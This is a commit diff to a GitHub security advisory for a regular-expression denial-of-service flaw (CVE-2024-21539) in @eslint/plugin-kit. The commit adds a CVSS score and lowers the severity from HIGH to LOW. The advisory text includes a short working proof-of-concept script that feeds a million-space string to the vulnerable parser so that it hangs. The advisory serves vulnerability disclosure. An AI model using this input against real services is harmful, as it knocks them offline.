Improve GHSA-7q7g-4xm8-89cq

github · Nov 16, 2024 · f0a89eb · f0a89eb
1 parent fb0abab
commit f0a89eb
Showing 1 changed file with 6 additions and 3 deletions.
diff --git a/advisories/github-reviewed/2024/11/GHSA-7q7g-4xm8-89cq/GHSA-7q7g-4xm8-89cq.json b/advisories/github-reviewed/2024/11/GHSA-7q7g-4xm8-89cq/GHSA-7q7g-4xm8-89cq.json
@@ -1,15 +1,18 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-7q7g-4xm8-89cq",
-  "modified": "2024-11-15T20:47:31Z",
+  "modified": "2024-11-15T20:47:32Z",
   "published": "2024-11-15T20:47:31Z",
   "aliases": [
     "CVE-2024-21539"
   ],
   "summary": "Regular Expression Denial of Service (ReDoS) in @eslint/plugin-kit",
   "details": "Crafting a very large and well crafted string can increase the CPU usage and crash the program.\n\n## POC\n\n```js\nconst { ConfigCommentParser } = require(\"@eslint/plugin-kit\");\n\nvar str = \"\";\nfor (var i = 0; i < 1000000; i++) {\n  str += \" \";\n}\nstr += \"A\";\n\nconsole.log(\"start\")\nvar parser = new ConfigCommentParser();\nconsole.log(parser.parseStringConfig(str, \"\"));\nconsole.log(\"end\")\n\n// run `npm i @eslint/plugin-kit` and `node attack.js` \n// then the program will stuck forever with high CPU usage\n```",
   "severity": [
-
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L"
+    }
   ],
   "affected": [
     {
@@ -50,7 +53,7 @@
     "cwe_ids": [
       "CWE-1333"
     ],
-    "severity": "HIGH",
+    "severity": "LOW",
     "github_reviewed": true,
     "github_reviewed_at": "2024-11-15T20:47:31Z",
     "nvd_published_at": null